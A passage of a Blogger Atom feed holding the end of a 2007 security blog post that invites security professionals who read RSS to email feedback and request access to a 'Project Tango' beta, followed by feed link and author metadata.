and let me know what you look for in getting your fix. 
What sites you read, what information you want, what information you don't want, and if you'd be interested in the Tango Beta.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Are you a security professional using RSS to feed your information needs, whether addict level or more of a recreational RSS user? Shoot me an email with your pet peeves, wants, information you don't or can't get via RSS, and if you'd be interested in the Tango Beta.&lt;/li&gt;&lt;li&gt;Are you just really curious about what Project Tango is and want to make a compelling case to get in on the beta? Shoot me an email.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;All email can be sent to tango.beta@vulnerableminds.com and we'll set you up for an early look at Project Tango.</content><link rel="replies" type="application/atom+xml" href="http://blog.vulnerableminds.com/feeds/2160007810901549525/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=3647430684627927763&amp;postID=2160007810901549525" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/2160007810901549525?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3647430684627927763/posts/default/2160007810901549525?v=2" /><link rel="alternate" type="text/html" href="http://blog.vulnerableminds.com/2007/05/time-for-tango.html" title="Time for a Tango" /><author><name>Scott J. 
Roberts</name><uri>http://www.blogger.com/profile/02657251441213846202</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="01489740236280153632" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry></feed>
